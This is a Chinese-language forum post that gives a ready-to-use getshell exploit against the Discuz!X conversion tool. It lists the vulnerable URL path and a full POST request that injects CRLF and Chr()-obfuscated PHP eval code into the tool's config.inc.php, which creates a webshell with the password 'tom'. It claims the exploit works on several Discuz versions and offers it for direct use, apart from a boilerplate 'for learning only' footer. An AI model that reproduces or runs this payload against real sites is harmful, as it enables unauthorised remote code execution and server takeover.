动态 版块 发帖 消息 我的
Loading...
HadSky
支持原创软件,共创美好明天!
管理员Lv1000004   
Discuz!X系列转换工具任意代码写入漏洞 getshell     
有些论坛 可能路径放在其它目录 没有utility 直接convert等


如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功


http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0


post提交:a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%28108%29.Chr%2840%29.Chr%2834%29.Chr%2836%29.Chr%2895%29.Chr%2880%29.Chr%2879%29.Chr%2883%29.Chr%2884%29.Chr%2891%29.Chr%28116%29.Chr%28111%29.Chr%28109%29.Chr%2893%29.Chr%2859%29.Chr%2834%29.Chr%2841%29.Chr%2859%29%29%3b%2f%2f%5d=localhost&newconfig%5bsource%5d%5bdbuser%5d=root&newconfig%5bsource%5d%5bdbpw%5d=&newconfig%5bsource%5d%5bdbname%5d=discuz&newconfig%5bsource%5d%5btablepre%5d=cdb_&newconfig%5bsource%5d%5bdbcharset%5d=&newconfig%5bsource%5d%5bpconnect%5d=1&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5btarget%5d%5bdbuser%5d=root&newconfig%5btarget%5d%5bdbpw%5d=&newconfig%5btarget%5d%5bdbname%5d=discuzx&newconfig%5btarget%5d%5btablepre%5d=pre_&newconfig%5btarget%5d%5bdbcharset%5d=&newconfig%5btarget%5d%5bpconnect%5d=1&submit=%b1%a3%b4%e6%b7%fe%ce%f1%c6%f7%c9%e8%d6%c3

http://webshell.cc/utility/convert/data/config.inc.php 密码是tom


经检测:DZ X1.5 2.0 3.1 等均成功GetShell

 0  已被阅读了17次  楼主 2019-09-02 05:39:41
回复列表

回复:Discuz!X系列转换工具任意代码写入漏洞 getshell

guest
登录之后更精彩~
Powered by HadSky 7.3.2
© 2015-2019 PuYueTian
您的IP:3.226.243.130,2019-09-18 11:15:53,Processed in 0.00664 second(s).
Powered by HadSky
本站技术仅供学习,抵制违法使用,共建绿色互联网!